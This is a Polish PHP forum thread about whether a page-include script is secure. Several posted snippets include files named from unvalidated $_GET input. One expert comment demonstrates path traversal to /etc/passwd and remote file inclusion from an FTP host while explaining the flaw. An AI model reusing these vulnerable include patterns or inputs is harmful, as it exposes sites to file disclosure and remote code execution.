Forum PHP.pl

Witam.
Czy ten oto kod będzie bezpieczny? Tzn. że nikt np. nie będzie mógł podglądać plików?

Bo troszkę go zmieniłem (w oryginale był krótszy), ale teraz jest problem bo jeśli wpisze samą nazwę strony (coś.pl) to zawartość news.php pojawia się dwa razy... A jeśli po strona= będzie np. omg to skrypt zamiast error.php pokazuje news.php. Można coś z tym zrobić? Szczególnie, że dość wolno to chodzi.
Dziękuje za pomoc

Ten post edytował Fragin 2.02.2010, 23:06:29

Lepiej użyj switch

[PHP] pobierz, plaintext 
 
$site = htmlspecialchars( $_GET[ 'site' ] );
 
switch( $site )
{
case 'news': include_once( 'news.php' ); break;
case 'kontakt': include_once( 'kontakt.php' ); break;
default: error.php;
}
 
[PHP] pobierz, plaintext 

Ooo... dzięki. Zaraz spróbuje czy działa.
Rozumiem, że to bezpieczna metoda?

Co w kodzie odpowiada temu miejscu:



Ten post edytował Fragin 2.02.2010, 23:32:31

Jak widać na Avatarze po lewej stronie nosze okulary i nie zauważyłem że za mało nawiasów jest.

Nie twoja wina. W którym miejscu ma być nawias w takim razie?

Stary chcesz programować a nie potrafisz namierzyć prostego błędu.

[PHP] pobierz, plaintext 
if( issset( $_GET[ 'site' ] )) <------------tu 2 otwarajace nawiasy i 2 zamykające
[PHP] pobierz, plaintext 

Nie pisz więcej takich postów bo mod waranem Cie nagrodzi i nie chodzi tu o domowego pupila.

Nie przesadzasz trochę? Ja się grzecznie pytam i od razu jakimś "waranem" mi grozisz?
A tak w ogóle. Nadal nie działa.

oto linijka:

Ooo... nie wywaliło żadnego błedu. Jutro zobaczę czemu jest jednak nic nie widać, być może usunełem pliki z serwera.
Dzięki za pomoc

//Jednak wszystko działa, dziękuje za pomoc jeszcze raz, można zamknąć!

Ten post edytował Fragin 3.02.2010, 00:32:36

Panie! Jak masz Pan takie rozwiazania polecac to moze sie akwizycja trojanow zajmij!
htmlspecialchars() nieczego tutaj nie gwarantuje, bo to zupelnie inna dzialka. XSS to atak na klienta po stronie przegladarki, a nie na serwer. Nazwy plikow natomiast niewiele maja wspolnego z html (poza rozszerzeniem w specyficznym wypadku...). Czas sie przeprosic z googlem.

Trudno. Mozesz sobie zrobic tablice i sprawdzac czy podana wartosc w $site jest jedna z wartosci, to bedziesz mial cos ala white list.

A do tego kodu, to moze malutkie omowienie jeszcze, zeby nikt nigdy wiecej takiego potworka na zywa strone nie wsadzil, bo ostatnio widzialem takie rozwiazanie u wroclawskiej firmy zajmujacej sie m. in. audytem bezpieczenstwa (sic!).

[PHP] pobierz, plaintext 
if( isset( $_GET[ 'site' ] )  // parametr podajemy - w koncu chcemy manipulowac...
{
  /**
  /* nic nie robi w rzeczywistosci.
  /* ./*;^ nie tknie aniani, dopiero < lub > sie przyczepi.
  /* ../../../../../../../etc/passwd jest ok i pozostanie niezmienione przez htmlspecialchars
   */
  $site = htmlspecialchars( $_GET[ 'site' ] );
 
  /**
  /* Jesli z jakichs powodow allow_url_fopen jest odpalone to juz jest masakra.
  /* HTTP co prawda nie obsluguje stat(), ale FTP juz tak, zatem file_exists() zwroci === true
  /* jesli znajdzie plik. Wynik?
  /* http ://stronka.pl/index.php?site=ftp://chaker.pl/exploit i mamy problem.
  /*
  /* Wersja alternatywna - http ://stronka.pl/index.php?site=index i mamy rekurencje wcinajaca pamiec jak pacman kuleczki.
   */
  if( file_exists( $site .'.php' ) == TRUE )
  {
    include_once( $site .'.php' );
  }
  else
  {
    include_once('error.php' );
  }   
}
else
{
  include_once( 'strona_glowna.php' );
}
 
?>
[PHP] pobierz, plaintext 

A ja robię to tak:

[PHP] pobierz, plaintext 
	if ($_GET['action']) {
		if (file_exists('actions/'.$_GET['action'].'.php')) {
			include_once('actions/'.$_GET['action'].'.php');
		}else{
			echo 'Not Found';
		}
	}else{
		//include_once('actions/news.php');
	}
[PHP] pobierz, plaintext 

Zaraz ktoś powinien czepić się zabezpieczeń, ale wszystko lata przez .htaccess więc dziwne znaki i tak nie przejdą.

Mozesz pokazac ten kawalek .htaccess ?

Proszę. (IMG:style_emoticons/default/smile.gif)

No dobrze, ale brakuje fragmentu, ktory chroni przed wpisaniem index.php?action=../index bezposrednio w przegladare.

A skąd wiesz na jaki adres przekierowuję przez .htaccess?

Security through obscurity - Wikipedia, warto, zebys przeczytal na poczatek, potem wiecej o bezpieczenstwie informacji, a nastepnie zastanowil sie nad tematem.
— Bruce Schneier, Applied Cryptography

Zastanowiłbyś się nad tym co piszesz. Mogę to równie dobrze przekierować na pliki html. (IMG:style_emoticons/default/winksmiley.jpg) Póki nikt nie ma dostępu do mojego serwera to nikt nie dowie się na jakiej zasadzie działa mój skrypt i jak przepisywane są adresy.

Dobrze, ze do kodu zrodlowego Internet Explorera nikt nie ma dostepu, bo mogloby sie okazac, ze jest tam blad... A tak to prosze, nigdy nikt nic nie znajdzie (IMG:style_emoticons/default/smile.gif) Cale z reszta szczescie, bo IE ma tyu uzytkownikow - mogliby byc zagrozeni!